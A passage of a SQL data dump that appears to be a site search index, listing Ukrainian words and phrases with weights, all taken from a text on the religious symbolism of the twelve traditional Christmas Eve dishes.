богом',0,1,1.5,'є000',1,'*'),(1629371,'єдності','єдності',0,0,0.4667,'є000',1,'*'),(1629372,'єдності навколо','єдності навколо',0,1,1.5,'є000',1,'*'),(1629373,'єдності навколо однієї','єдності навколо однієї',0,1,1.7333,'є000',1,'*'),(1629374,'єдності роду','єдності роду',0,1,1.4,'є000',1,'*'),(1629375,'єдності роду капусняк','єдності роду капусняк',0,1,1.7,'є000',1,'*'),(1629376,'і вареники','і вареники',0,1,1.3333,'і000',1,'*'),(1629377,'і вареники достаток','і вареники достаток',0,1,1.6333,'і000',1,'*'),(1629378,'і воскресіння','і воскресіння',0,1,1.4333,'і000',1,'*'),(1629379,'і воскресіння горох','і воскресіння горох',0,1,1.6333,'і000',1,'*'),(1629380,'і земна','і земна',0,1,1.2333,'і000',1,'*'),(1629381,'і земна корінець','і земна корінець',0,1,1.5333,'і000',1,'*'),(1629382,'і світом','і світом',0,1,1.2667,'і000',1,'*'),(1629383,'і світом померлих','і світом померлих',0,1,1.5667,'і000',1,'*'),(1629384,'її залишають','її залишають',0,1,1.4,'ї000',1,'*'),(1629385,'її залишають на','її залишають на',0,1,1.5,'ї000',1,'*'),(1629386,'із символів','із символів',0,1,1.3667,'і000',1,'*'),(1629387,'із символів ісуса','із символів ісуса',0,1,1.5667,'і000',1,'*'),(1629388,'інколи домашньої','інколи домашньої',0,1,1.5333,'і000',1,'*'),(1629389,'інколи домашньої випічки','інколи домашньої випічки',0,1,1.8,'і000',1,'*'),(1629390,'ірода','ірода',0,0,0.3333,'і000',1,'*'),(1629391,'ірода голубці','ірода голубці',0,1,1.4333,'і000',1,'*'),(1629392,'ірода голубці символ','ірода голубці символ',0,1,1.6667,'і000',1,'*'),(1629393,'ісус','ісус',0,0,0.2667,'і000',1,'*'),(1629394,'ісус христос','ісус христос',0,1,1.4,'і000',1,'*'),(1629395,'ісус христос спаситель','ісус христос спаситель',0,1,1.7333,'і000',1,'*'),(1629396,'ісуса','ісуса',0,0,0.3333,'і000',1,'*'),(1629397,'ісуса христа','ісуса христа',0,1,1.4,'і000',1,'*'),(1629398,'ісуса христа божественна','ісуса христа божественна',0,1,1.8,'і000',1,'*'),(1629399,'ісуса христа мед','ісуса христа мед',0,1,1.5333,'і000',1,'*'),(1629400,'ісуса христа у','ісуса христа у',0,1,1.4667,'і000',1,'*'),(1629401,'а не просту','а не просту',0,1,1.3667,'а000',1,'*'),(1629402,'а потім','а потім',0,1,1.2333,'а000',1,'*'),(1629403,'а потім споживають','а потім споживають',0,1,1.6,'а000',1,'*'),(1629404,'богом','богом',0,0,0.3333,'б000',1,'*'),(1629405,'богом і','богом і',0,1,1.2333,'б000',1,'*'),(1629406,'богом і світом','богом і світом',0,1,1.4667,'б000',1,'*'),(1629407,'богом часник','богом часник',0,1,1.4,'б000',1,'*'),(1629408,'богом часник очищення','богом часник очищення',0,1,1.7,'б000',1,'*'),(1629409,'божественна','божественна',0,0,0.7333,'б000',1,'*'),(1629410,'божественна шапка','божественна шапка',0,1,1.5667,'б000',1,'*'),(1629411,'божественна шапка і','божественна шапка і',0,1,1.6333,'б000',1,'*'),(1629412,'божий','божий',0,0,0.3333,'б000',1,'*'),(1629413,'божий вареники','божий вареники',0,1,1.4667,'б000',1,'*'),(1629414,'божий вареники достаток','божий вареники достаток',0,1,1.7667,'б000',1,'*'),(1629415,'божого','божого',0,0,0.4,'б000',1,'*'),(1629416,'божого слова','божого слова',0,1,1.4,'б000',1,'*'),(1629417,'божого слова корачун','божого слова корачун',0,1,1.6667,'б000',1,'*'),(1629418,'боліли','боліли',0,0,0.4,'б000',1,'*'),(1629419,'борщ','борщ',0,0,0.2667,'б000',1,'*'),(1629420,'борщ нагадує','борщ нагадує',0,1,1.4,'б000',1,'*'),(1629421,'борщ нагадує про','борщ нагадує про',0,1,1.5333,'б000',1,'*'),(1629422,'бути','бути',0,0,0.2667,'б000',1,'*'),(1629423,'бути на','бути на',0,1,1.2333,'б000',1,'*'),(1629424,'бути на столі','бути на столі',0,1,1.4333,'б000',1,'*'),(1629425,'буханка','буханка',0,0,0.4667,'б000',1,'*'),(1629426,'буханка хліба','буханка хліба',0,1,1.4333,'б000',1,'*'),(1629427,'буханка хліба інколи','буханка хліба інколи',0,1,1.6667,'б000',1,'*'),(1629428,'від гріхів','від гріхів',0,1,1.3333,'в000',1,'*'),(1629429,'від гріхів також','від гріхів також',0,1,1.5333,'в000',1,'*'),(1629430,'вареники','вареники',0,0,0.5333,'в000',1,'*'),(1629431,'вареники достаток','вареники достаток',0,1,1.5667,'в000',1,'*'),(1629432,'вареники достаток ситність','вареники достаток ситність',0,1,1.8667,'в000',1,'*'),(1629433,'вареники достаток узвар','вареники достаток узвар',0,1,1.7667,'в000',1,'*'),(1629434,'випічки','випічки',0,0,0.4667,'в000',1,'*'),(1629435,'випічки калач','випічки калач',0,1,1.4333,'в000',1,'*'),(1629436,'випічки калач символізує','випічки калач символізує',0,1,1.8,'в000',1,'*'),(1629437,'вифлеємську','вифлеємську',0,0,0.7333,'в000',1,'*'),(1629438,'вифлеємську ніч','вифлеємську ніч',0,1,1.5,'в000',1,'*'),(1629439,'вифлеємську ніч за','вифлеємську ніч за',0,1,1.6,'в000',1,'*'),(1629440,'воскресіння','воскресіння',0,0,0.7333,'в000',1,'*'),(1629441,'воскресіння горох','воскресіння горох',0,1,1.5667,'в000',1,'*'),(1629442,'воскресіння горох квасоля','воскресіння горох квасоля',0,1,1.8333,'в000',1,'*'),(1629443,'входять до неї','входять до неї',0,1,1.4667,'в000',1,'*'),(1629444,'глибоке','глибоке',0,0,0.4667,'г000',1,'*'),(1629445,'глибоке символічне','глибоке символічне',0,1,1.6,'г000',1,'*'),(1629446,'глибоке символічне значення','глибоке символічне значення',0,1,1.9,'г000',1,'*'),(1629447,'голуба який','голуба який',0,1,1.3667,'г000',1,'*'),(1629448,'голуба який уособлює','голуба який уособлює',0,1,1.6667,'г000',1,'*'),(1629449,'голубці','голубці',0,0,0.4667,'г000',1,'*'),(1629450,'голубці символ','голубці символ',0,1,1.4667,'г000',1,'*'),(1629451,'голубці символ голуба','голубці символ голуба',0,1,1.7,'г000',1,'*'),(1629452,'горох','горох',0,0,0.3333,'г000',1,'*'),(1629453,'горох квасоля','горох квасоля',0,1,1.4333,'г000',1,'*'),(1629454,'горох квасоля символ','горох квасоля символ',0,1,1.6667,'г000',1,'*'),(1629455,'гріхів','гріхів',0,0,0.4,'г000',1,'*'),(1629456,'гріхів також','гріхів також',0,1,1.4,'г000',1,'*'),(1629457,'гріхів також символізує','гріхів також символізує',0,1,1.7667,'г000',1,'*'),(1629458,'грецького','грецького',0,0,0.6,'г000',1,'*'),(1629459,'грецького слова','грецького слова',0,1,1.5,'г000',1,'*'),(1629460,'грецького слова риба','грецького слова риба',0,1,1.6667,'г000',1,'*'),(1629461,'гриби','гриби',0,0,0.3333,'г000',1,'*'),(1629462,'гриби дві','гриби дві',0,1,1.3,'г000',1,'*'),(1629463,'гриби дві природи','гриби дві природи',0,1,1.5667,'г000',1,'*'),(1629464,'дітей убитих','дітей убитих',0,1,1.4,'д000',1,'*'),(1629465,'дітей убитих у','дітей убитих у',0,1,1.4667,'д000',1,'*'),(1629466,'дароване','дароване',0,0,0.5333,'д000',1,'*'),(1629467,'дароване богом','дароване богом',0,1,1.4667,'д000',1,'*'),(1629468,'дароване богом часник','дароване богом часник',0,1,1.7,'д000',1,'*'),(1629469,'дві природи','дві природи',0,1,1.3667,'д000',1,'*'),(1629470,'дві природи ісуса','дві природи ісуса',0,1,1.5667,'д000',1,'*'),(1629471,'деякі продукти','деякі продукти',0,1,1.4667,'д000',1,'*'),(1629472,'деякі продукти які','деякі продукти які',0,1,1.6,'д000',1,'*'),(1629473,'для душ','для душ',0,1,1.2333,'д000',1,'*'),(1629474,'для душ усопших','для душ усопших',0,1,1.5,'д000',1,'*'),(1629475,'до куті','до куті',0,1,1.2333,'д000',1,'*'),(1629476,'до куті символізує','до куті символізує',0,1,1.6,'д000',1,'*'),(1629477,'до неї','до неї',0,1,1.2,'д000',2,'*'),(1629478,'до неї мають','до неї мають',0,1,1.4,'д000',1,'*'),(1629479,'додають','додають',0,0,0.4667,'д000',1,'*'),(1629480,'додають до','додають до',0,1,1.3333,'д000',1,'*'),(1629481,'додають до куті','додають до куті',0,1,1.5,'д000',1,'*'),(1629482,'домашній сімейній','домашній сімейній',0,1,1.5667,'д000',1,'*'),(1629483,'домашній сімейній церкві','домашній сімейній церкві',0,1,1.8,'д000',1,'*'),(1629484,'домашньої','домашньої',0,0,0.6,'д000',1,'*'),(1629485,'домашньої випічки','домашньої випічки',0,1,1.5667,'д000',1,'*'),(1629486,'домашньої випічки калач','домашньої випічки калач',0,1,1.7667,'д000',1,'*'),(1629487,'достаток','достаток',0,0,0.5333,'д000',1,'*'),(1629488,'достаток ситність','достаток ситність',0,1,1.5667,'д000',1,'*'),(1629489,'достаток ситність гриби','достаток ситність гриби',0,1,1.7667,'д000',1,'*'),(1629490,'достаток узвар','достаток узвар',0,1,1.4667,'д000',1,'*'),(1629491,'достаток узвар життялюдини','достаток узвар життялюдини',0,1,1.8667,'д000',1,'*'),(1629492,'душ','душ',0,0,0.2,'д000',1,'*'),(1629493,'душ усопших','душ усопших',0,1,1.3667,'д000',1,'*'),(1629494,'душ усопших не','душ усопших не',0,1,1.4667,'д000',1,'*'),(1629495,'життя у','життя у',0,1,1.2333,'ж000',1,'*'),(1629496,'життя у домашній','життя у домашній',0,1,1.5333,'ж000',1,'*'),(1629497,'життялюдини','життялюдини',0,0,0.7333,'ж000',1,'*'),(1629498,'життялюдини дароване','життялюдини дароване',0,1,1.6667,'ж000',1,'*'),(1629499,'життялюдини дароване богом','життялюдини дароване богом',0,1,1.8667,'ж000',1,'*'),(1629500,'з 12','з 12',0,1,1.1333,'з000',1,'*'),(1629501,'з 12 страв','з 12 страв',0,1,1.3333,'з000',1,'*'),(1629502,'з богом','з богом',0,1,1.2333,'з000',1,'*'),(1629503,'з богом і','з богом і',0,1,1.3,'з000',1,'*'),(1629504,'з неї','з неї',0,1,1.1667,'з000',1,'*'),(1629505,'з неї починають','з неї починають',0,1,1.5,'з000',1,'*'),(1629506,'зі столу','зі столу',0,1,1.2667,'з000',1,'*'),(1629507,'зі столу мак','зі столу мак',0,1,1.4,'з000',1,'*'),(1629508,'за наказом','за наказом',0,1,1.3333,'з000',1,'*'),(1629509,'за наказом ірода','за наказом ірода',0,1,1.5333,'з000',1,'*'),(1629510,'залишають','залишають',0,0,0.6,'з000',1,'*'),(1629511,'залишають на','залишають на',0,1,1.4,'з000',1,'*'),(1629512,'залишають на ніч','залишають на ніч',0,1,1.5333,'з000',1,'*'),(1629513,'зашифровані','зашифровані',0,0,0.7333,'з000',1,'*'),(1629514,'зашифровані слова','зашифровані слова',0,1,1.5667,'з000',1,'*'),(1629515,'зашифровані слова ісус','зашифровані слова ісус',0,1,1.7333,'з000',1,'*'),(1629516,'здоров\'я його','здоров його',0,1,1.4333,'з000',1,'*'),(1629517,'здоров\'я його кладуть','здоров його кладуть',0,1,1.7,'з000',1,'*'),(1629518,'здоров\'я як','здоров як',0,1,1.3667,'з000',1,'*'),(1629519,'здоров\'я як і','здоров як і',0,1,1.4333,'з000',1,'*'),(1629520,'земна','земна',0,0,0.3333,'з000',1,'*'),(1629521,'земна корінець','земна корінець',0,1,1.4667,'з000',1,'*'),(1629522,'земна корінець пампушки','земна корінець пампушки',0,1,1.7667,'з000',1,'*'),(1629523,'знак християн','знак християн',0,1,1.4333,'з000',1,'*'),(1629524,'знак християн один','знак християн один',0,1,1.6,'з000',1,'*'),(1629525,'значення','значення',0,0,0.5333,'з000',1,'*'),(1629526,'значення а','значення а',0,1,1.3333,'з000',1,'*'),(1629527,'значення а не','значення а не',0,1,1.4333,'з000',1,'*'),(1629528,'зуби','зуби',0,0,0.2667,'з000',1,'*'),(1629529,'зуби не','зуби не',0,1,1.2333,'з000',1,'*'),(1629530,'зуби не боліли','зуби не боліли',0,1,1.4667,'з000',1,'*'),(1629531,'його кладуть','його кладуть',0,1,1.4,'й000',1,'*'),(1629532,'його кладуть на','його кладуть на',0,1,1.5,'й000',1,'*'),(1629533,'калач','калач',0,0,0.3333,'к000',1,'*'),(1629534,'калач символізує','калач символізує',0,1,1.5333,'к000',1,'*'),(1629535,'калач символізує смерть','калач символізує смерть',0,1,1.7667,'к000',1,'*'),(1629536,'капусняк','капусняк',0,0,0.5333,'к000',1,'*'),(1629537,'капусняк символ','капусняк символ',0,1,1.5,'к000',1,'*'),(1629538,'капусняк символ єдності','капусняк символ єдності',0,1,1.7667,'к000',1,'*'),(1629539,'квасоля','квасоля',0,0,0.4667,'к000',1,'*'),(1629540,'квасоля символ','квасоля символ',0,1,1.4667,'к000',1,'*'),(1629541,'квасоля символ християнського','квасоля символ християнського',0,1,1.9667,'к000',1,'*'),(1629542,'кладуть','кладуть',0,0,0.4667,'к000',1,'*'),(1629543,'кладуть на','кладуть на',0,1,1.3333,'к000',1,'*'),(1629544,'кладуть на чотири','кладуть на чотири',0,1,1.5667,'к000',1,'*'),(1629545,'кожна з','кожна з',0,1,1.2333,'к000',1,'*'),(1629546,'кожна з 12','кожна з 12',0,1,1.3333,'к000',1,'*'),(1629547,'корінець','корінець',0,0,0.5333,'к000',1,'*'),(1629548,'корінець пампушки','корінець пампушки',0,1,1.5667,'к000',1,'*'),(1629549,'корінець пампушки щастя','корінець пампушки щастя',0,1,1.7667,'к000',1,'*'),(1629550,'корачун','корачун',0,0,0.4667,'к000',1,'*'),(1629551,'корачун кругла','корачун кругла',0,1,1.4667,'к000',1,'*'),(1629552,'корачун кругла буханка','корачун кругла буханка',0,1,1.7333,'к000',1,'*'),(1629553,'кругла','кругла',0,0,0.4,'к000',1,'*'),(1629554,'кругла буханка','кругла буханка',0,1,1.4667,'к000',1,'*'),(1629555,'кругла буханка хліба','кругла буханка хліба',0,1,1.6667,'к000',1,'*'),(1629556,'куті','куті',0,0,0.2667,'к000',1,'*'),(1629557,'куті символізує','куті символізує',0,1,1.5,'к000',1,'*'),(1629558,'куті символізує мучеництво','куті символізує мучеництво',0,1,1.8667,'к000',1,'*'),(1629559,'кутки','кутки',0,0,0.3333,'к000',1,'*'),(1629560,'кутки столу','кутки столу',0,1,1.3667,'к000',1,'*'),(1629561,'кутки столу а','кутки столу а',0,1,1.4333,'к000',1,'*'),(1629562,'кутя','кутя',0,0,0.2667,'к000',1,'*'),(1629563,'кутя найголовніша','кутя найголовніша',0,1,1.5667,'к000',1,'*'),(1629564,'кутя найголовніша страва','кутя найголовніша страва',0,1,1.8,'к000',1,'*'),(1629565,'літерах','літерах',0,0,0.4667,'л000',1,'*'),(1629566,'літерах грецького','літерах грецького',0,1,1.5667,'л000',1,'*'),(1629567,'літерах грецького слова','літерах грецького слова',0,1,1.7667,'л000',1,'*'),(1629568,'мак','мак',0,0,0.2,'м000',1,'*'),(1629569,'мак який','мак який',0,1,1.2667,'м000',1,'*'),(1629570,'мак який додають','мак який додають',0,1,1.5333,'м000',1,'*'),(1629571,'мають глибоке','мають глибоке',0,1,1.4333,'м000',1,'*'),(1629572,'мають глибоке символічне','мають глибоке символічне',0,1,1.8,'м000',1,'*'),(1629573,'мед','мед',0,0,0.2,'м000',1,'*'),(1629574,'мед символ','мед символ',0,1,1.3333,'м000',1,'*'),(1629575,'мед символ чистоти','мед символ чистоти',0,1,1.6,'м000',1,'*'),(1629576,'мир','мир',0,0,0.2,'м000',1,'*'),(1629577,'мир риба','мир риба',0,1,1.2667,'м000',1,'*'),(1629578,'мир риба знак','мир риба знак',0,1,1.4333,'м000',1,'*'),(1629579,'мучеництво','мучеництво',0,0,0.6667,'м000',1,'*'),(1629580,'мучеництво ісуса','мучеництво ісуса',0,1,1.5333,'м000',1,'*'),(1629581,'мучеництво ісуса христа','мучеництво ісуса христа',0,1,1.7667,'м000',1,'*'),(1629582,'ніч','ніч',0,0,0.2,'н000',1,'*'),(1629583,'ніч для','ніч для',0,1,1.2333,'н000',1,'*'),(1629584,'ніч для душ','ніч для душ',0,1,1.3667,'н000',1,'*'),(1629585,'ніч за','ніч за',0,1,1.2,'н000',1,'*'),(1629586,'ніч за наказом','ніч за наказом',0,1,1.4667,'н000',1,'*'),(1629587,'на ніч','на ніч',0,1,1.2,'н000',1,'*'),(1629588,'на ніч для','на ніч для',0,1,1.3333,'н000',1,'*'),(1629589,'на свят-вечір','на свят-вечір',0,1,1.4333,'н000',1,'*'),(1629590,'на столі','на столі',0,1,1.2667,'н000',1,'*'),(1629591,'на столі з','на столі з',0,1,1.3333,'н000',1,'*'),(1629592,'на столі на','на столі на',0,1,1.3667,'н000',1,'*'),(1629593,'на чотири кутки','на чотири кутки',0,1,1.5,'н000',1,'*'),(1629594,'навколо','навколо',0,0,0.4667,'н000',1,'*'),(1629595,'навколо однієї','навколо однієї',0,1,1.4667,'н000',1,'*'),(1629596,'навколо однієї основи','навколо однієї основи',0,1,1.7,'н000',1,'*'),(1629597,'нагадує','нагадує',0,0,0.4667,'н000',1,'*'),(1629598,'нагадує про','нагадує про',0,1,1.3667,'н000',1,'*'),(1629599,'нагадує про дітей','нагадує про дітей',0,1,1.5667,'н000',1,'*'),(1629600,'надії оптимізму','надії оптимізму',0,1,1.5,'н000',1,'*'),(1629601,'надії оптимізму солодкого','надії оптимізму солодкого',0,1,1.8333,'н000',1,'*'),(1629602,'найголовніша','найголовніша',0,0,0.8,'н000',1,'*'),(1629603,'найголовніша страва','найголовніша страва',0,1,1.6333,'н000',1,'*'),(1629604,'найголовніша страва на','найголовніша страва на',0,1,1.7333,'н000',1,'*'),(1629605,'наказом','наказом',0,0,0.4667,'н000',1,'*'),(1629606,'наказом ірода','наказом ірода',0,1,1.4333,'н000',1,'*'),(1629607,'наказом ірода голубці','наказом ірода голубці',0,1,1.7,'н000',1,'*'),(1629608,'не боліли','не боліли',0,1,1.3,'н000',1,'*'),(1629609,'не прибирають','не прибирають',0,1,1.4333,'н000',1,'*'),(1629610,'не прибирають зі','не прибирають зі',0,1,1.5333,'н000',1,'*'),(1629611,'не просту','не просту',0,1,1.3,'н000',1,'*'),(1629612,'не просту традиційність','не просту традиційність',0,1,1.7667,'н000',1,'*'),(1629613,'неї','неї',0,0,0.2,'н000',2,'*'),(1629614,'неї мають','неї мають',0,1,1.3,'н000',1,'*'),(1629615,'неї мають глибоке','неї мають глибоке',0,1,1.5667,'н000',1,'*'),(1629616,'неї починають','неї починають',0,1,1.4333,'н000',1,'*'),(1629617,'неї починають трапезу','неї починають трапезу',0,1,1.7,'н000',1,'*'),(1629618,'один із','один із',0,1,1.2333,'о000',2,'*'),(1629619,'один із символів','один із символів',0,1,1.5333,'о000',1,'*'),(1629620,'однієї','однієї',0,0,0.4,'о000',1,'*'),(1629621,'однієї основи','однієї основи',0,1,1.4333,'о000',1,'*'),(1629622,'однієї основи христа-бога','однієї основи христа-бога',0,1,1.8333,'о000',1,'*'),(1629623,'оптимізму','оптимізму',0,0,0.6,'о000',1,'*'),(1629624,'оптимізму солодкого','оптимізму солодкого',0,1,1.6333,'о000',1,'*'),(1629625,'оптимізму солодкого божого','оптимізму солодкого божого',0,1,1.8667,'о000',1,'*'),(1629626,'основи','основи',0,0,0.4,'о000',1,'*'),(1629627,'основи христа-бога','основи христа-бога',0,1,1.6,'о000',1,'*'),(1629628,'основи христа-бога борщ','основи христа-бога борщ',0,1,1.7667,'о000',1,'*'),(1629629,'очищення','очищення',0,0,0.5333,'о000',1,'*'),(1629630,'очищення від','очищення від',0,1,1.4,'о000',1,'*'),(1629631,'очищення від гріхів','очищення від гріхів',0,1,1.6333,'о000',1,'*'),(1629632,'пампушки','пампушки',0,0,0.5333,'п000',1,'*'),(1629633,'пампушки щастя','пампушки щастя',0,1,1.4667,'п000',1,'*'),(1629634,'пампушки щастя здоров\'я','пампушки щастя здоров',0,1,1.7667,'п000',1,'*'),(1629635,'перших','перших',0,0,0.4,'п000',1,'*'),(1629636,'перших літерах','перших літерах',0,1,1.4667,'п000',1,'*'),(1629637,'перших літерах грецького','перших літерах грецького',0,1,1.8,'п000',1,'*'),(1629638,'повинно','повинно',0,0,0.4667,'п000',1,'*'),(1629639,'повинно бути','повинно бути',0,1,1.4,'п000',1,'*'),(1629640,'повинно бути на','повинно бути на',0,1,1.5,'п000',1,'*'),(1629641,'померлих','померлих',0,0,0.5333,'п000',1,'*'),(1629642,'померлих тому','померлих тому',0,1,1.4333,'п000',1,'*'),(1629643,'померлих тому її','померлих тому її',0,1,1.5333,'п000',1,'*'),(1629644,'потім споживають','потім споживають',0,1,1.5333,'п000',1,'*'),(1629645,'потім споживають щоб','потім споживають щоб',0,1,1.6667,'п000',1,'*'),(1629646,'починають','починають',0,0,0.6,'п000',1,'*'),(1629647,'починають трапезу','починають трапезу',0,1,1.5667,'п000',1,'*'),(1629648,'починають трапезу символізує','починають трапезу символізує',0,1,1.9333,'п000',1,'*'),(1629649,'прибирають','прибирають',0,0,0.6667,'п000',1,'*'),(1629650,'прибирають зі','прибирають зі',0,1,1.4333,'п000',1,'*'),(1629651,'прибирають зі столу','прибирають зі столу',0,1,1.6333,'п000',1,'*'),(1629652,'природи','природи',0,0,0.4667,'п000',1,'*'),(1629653,'природи ісуса','природи ісуса',0,1,1.4333,'п000',1,'*'),(1629654,'природи ісуса христа','природи ісуса христа',0,1,1.6667,'п000',1,'*'),(1629655,'про дітей','про дітей',0,1,1.3,'п000',1,'*'),(1629656,'про дітей убитих','про дітей убитих',0,1,1.5333,'п000',1,'*'),(1629657,'продукти','продукти',0,0,0.5333,'п000',2,'*'),(1629658,'продукти які','продукти які',0,1,1.4,'п000',1,'*'),(1629659,'продукти які входять','продукти які входять',0,1,1.6667,'п000',1,'*'),(1629660,'просту','просту',0,0,0.4,'п000',1,'*'),(1629661,'просту традиційність','просту традиційність',0,1,1.6667,'п000',1,'*'),(1629662,'просту традиційність кутя','просту традиційність кутя',0,1,1.8333,'п000',1,'*'),(1629663,'риба','риба',0,0,0.2667,'р000',1,'*'),(1629664,'риба зашифровані','риба зашифровані',0,1,1.5333,'р000',1,'*'),(1629665,'риба зашифровані слова','риба зашифровані слова',0,1,1.7333,'р000',1,'*'),(1629666,'риба знак','риба знак',0,1,1.3,'р000',1,'*'),(1629667,'риба знак християн','риба знак християн',0,1,1.6,'р000',1,'*'),(1629668,'роду','роду',0,0,0.2667,'р000',1,'*'),(1629669,'роду капусняк','роду капусняк',0,1,1.4333,'р000',1,'*'),(1629670,'роду капусняк символ','роду капусняк символ',0,1,1.6667,'р000',1,'*'),(1629671,'сімейній','сімейній',0,0,0.5333,'с000',1,'*'),(1629672,'сімейній церкві','сімейній церкві',0,1,1.5,'с000',1,'*'),(1629673,'сімейній церкві символ','сімейній церкві символ',0,1,1.7333,'с000',1,'*'),(1629674,'світом','світом',0,0,0.4,'с000',1,'*'),(1629675,'світом померлих','світом померлих',0,1,1.5,'с000',1,'*'),(1629676,'світом померлих тому','світом померлих тому',0,1,1.6667,'с000',1,'*'),(1629677,'свят-вечір','свят-вечір',0,0,0.6667,'с000',1,'*'),(1629678,'символ єдності','символ єдності',0,1,1.4667,'с000',1,'*'),(1629679,'символ єдності навколо','символ єдності навколо',0,1,1.7333,'с000',1,'*'),(1629680,'символ єдності роду','символ єдності роду',0,1,1.6333,'с000',1,'*'),(1629681,'символ голуба','символ голуба',0,1,1.4333,'с000',1,'*'),(1629682,'символ голуба який','символ голуба який',0,1,1.6,'с000',1,'*'),(1629683,'символ християнського','символ християнського',0,1,1.7,'с000',1,'*'),(1629684,'символ християнського життя','символ християнського життя',0,1,1.9,'с000',1,'*'),(1629685,'символ чистоти','символ чистоти',0,1,1.4667,'с000',1,'*'),(1629686,'символ чистоти надії','символ чистоти надії',0,1,1.6667,'с000',1,'*'),(1629687,'символів','символів',0,0,0.5333,'с000',1,'*'),(1629688,'символів ісуса','символів ісуса',0,1,1.4667,'с000',1,'*'),(1629689,'символів ісуса христа','символів ісуса христа',0,1,1.7,'с000',1,'*'),(1629690,'символізує','символізує',0,0,0.6667,'с000',1,'*'),(1629691,'символізує єднання','символізує єднання',0,1,1.6,'с000',1,'*'),(1629692,'символізує єднання з','символізує єднання з',0,1,1.6667,'с000',1,'*'),(1629693,'символізує здоров\'я','символізує здоров',0,1,1.6333,'с000',1,'*'),(1629694,'символізує здоров\'я його','символізує здоров його',0,1,1.8,'с000',1,'*'),(1629695,'символізує мучеництво','символізує мучеництво',0,1,1.7,'с000',1,'*'),(1629696,'символізує мучеництво ісуса','символізує мучеництво ісуса',0,1,1.9,'с000',1,'*'),(1629697,'символізує смерть','символізує смерть',0,1,1.5667,'с000',1,'*'),(1629698,'символізує смерть і','символізує смерть і',0,1,1.6333,'с000',1,'*'),(1629699,'символічне','символічне',0,0,0.6667,'с000',1,'*'),(1629700,'символічне значення','символічне значення',0,1,1.6333,'с000',1,'*'),(1629701,'символічне значення а','символічне значення а',0,1,1.7,'с000',1,'*'),(1629702,'син','син',0,0,0.2,'с000',1,'*'),(1629703,'син божий','син божий',0,1,1.3,'с000',1,'*'),(1629704,'син божий вареники','син божий вареники',0,1,1.6,'с000',1,'*'),(1629705,'ситність','ситність',0,0,0.5333,'с000',1,'*'),(1629706,'ситність гриби','ситність гриби',0,1,1.4667,'с000',1,'*'),(1629707,'ситність гриби дві','ситність гриби дві',0,1,1.6,'с000',1,'*'),(1629708,'слова','слова',0,0,0.3333,'с000',1,'*'),(1629709,'слова ісус','слова ісус',0,1,1.3333,'с000',1,'*'),(1629710,'слова ісус христос','слова ісус христос',0,1,1.6,'с000',1,'*'),(1629711,'слова корачун','слова корачун',0,1,1.4333,'с000',1,'*'),(1629712,'слова корачун кругла','слова корачун кругла',0,1,1.6667,'с000',1,'*'),(1629713,'слова риба','слова риба',0,1,1.3333,'с000',1,'*'),(1629714,'слова риба зашифровані','слова риба зашифровані',0,1,1.7333,'с000',1,'*'),(1629715,'смерть','смерть',0,0,0.4,'с000',1,'*'),(1629716,'смерть і','смерть і',0,1,1.2667,'с000',1,'*'),(1629717,'смерть і воскресіння','смерть і воскресіння',0,1,1.6667,'с000',1,'*'),(1629718,'солодкого','солодкого',0,0,0.6,'с000',1,'*'),(1629719,'солодкого божого','солодкого божого',0,1,1.5333,'с000',1,'*'),(1629720,'солодкого божого слова','солодкого божого слова',0,1,1.7333,'с000',1,'*'),(1629721,'спаситель','спаситель',0,0,0.6,'с000',1,'*'),(1629722,'спаситель син','спаситель син',0,1,1.4333,'с000',1,'*'),(1629723,'спаситель син божий','спаситель син божий',0,1,1.6333,'с000',1,'*'),(1629724,'споживають','споживають',0,0,0.6667,'с000',1,'*'),(1629725,'споживають щоб','споживають щоб',0,1,1.4667,'с000',1,'*'),(1629726,'споживають щоб зуби','споживають щоб зуби',0,1,1.6333,'с000',1,'*'),(1629727,'столі','столі',0,0,0.3333,'с000',1,'*'),(1629728,'столі з','столі з',0,1,1.2333,'с000',1,'*'),(1629729,'столі з неї','столі з неї',0,1,1.3667,'с000',1,'*'),(1629730,'столі на','столі на',0,1,1.2667,'с000',1,'*'),(1629731,'столі на свят-вечір','столі на свят-вечір',0,1,1.6333,'с000',1,'*'),(1629732,'столу','столу',0,0,0.3333,'с000',1,'*'),(1629733,'столу а','столу а',0,1,1.2333,'с000',1,'*'),(1629734,'столу а потім','столу а потім',0,1,1.4333,'с000',1,'*'),(1629735,'столу мак','столу мак',0,1,1.3,'с000',1,'*'),(1629736,'столу мак який','столу мак який',0,1,1.4667,'с000',1,'*'),(1629737,'страв','страв',0,0,0.3333,'с000',1,'*'),(1629738,'страв та','страв та',0,1,1.2667,'с000',1,'*'),(1629739,'страв та деякі','страв та деякі',0,1,1.4667,'с000',1,'*'),(1629740,'страва','страва',0,0,0.4,'с000',1,'*'),(1629741,'страва на','страва на',0,1,1.3,'с000',1,'*'),(1629742,'страва на столі','страва на столі',0,1,1.5,'с000',1,'*'),(1629743,'та деякі','та деякі',0,1,1.2667,'т000',1,'*'),(1629744,'та деякі продукти','та деякі продукти',0,1,1.5667,'т000',1,'*'),(1629745,'також символізує','також символізує',0,1,1.5333,'т000',1,'*'),(1629746,'також символізує здоров\'я','також символізує здоров',0,1,1.8333,'т000',1,'*'),(1629747,'тому її','тому її',0,1,1.2333,'т000',1,'*'),(1629748,'тому її залишають','тому її залишають',0,1,1.5667,'т000',1,'*'),(1629749,'традиційність','традиційність',0,0,0.8667,'т000',1,'*'),(1629750,'традиційність кутя','традиційність кутя',0,1,1.6,'т000',1,'*'),(1629751,'традиційність кутя найголовніша','традиційність кутя найголовніша',0,1,2,'т000',1,'*'),(1629752,'трапезу','трапезу',0,0,0.4667,'т000',1,'*'),(1629753,'трапезу символізує','трапезу символізує',0,1,1.6,'т000',1,'*'),(1629754,'трапезу символізує єднання','трапезу символізує єднання',0,1,1.8667,'т000',1,'*'),(1629755,'у вифлеємську','у вифлеємську',0,1,1.4333,'у000',1,'*'),(1629756,'у вифлеємську ніч','у вифлеємську ніч',0,1,1.5667,'у000',1,'*'),(1629757,'у домашній','у домашній',0,1,1.3333,'у000',1,'*'),(1629758,'у домашній сімейній','у домашній сімейній',0,1,1.6333,'у000',1,'*'),(1629759,'у перших','у перших',0,1,1.2667,'у000',1,'*'),(1629760,'у перших літерах','у перших літерах',0,1,1.5333,'у000',1,'*'),(1629761,'убитих','убитих',0,0,0.4,'у000',1,'*'),(1629762,'убитих у','убитих у',0,1,1.2667,'у000',1,'*'),(1629763,'убитих у вифлеємську','убитих у вифлеємську',0,1,1.6667,'у000',1,'*'),(1629764,'узвар','узвар',0,0,0.3333,'у000',1,'*'),(1629765,'узвар життялюдини','узвар 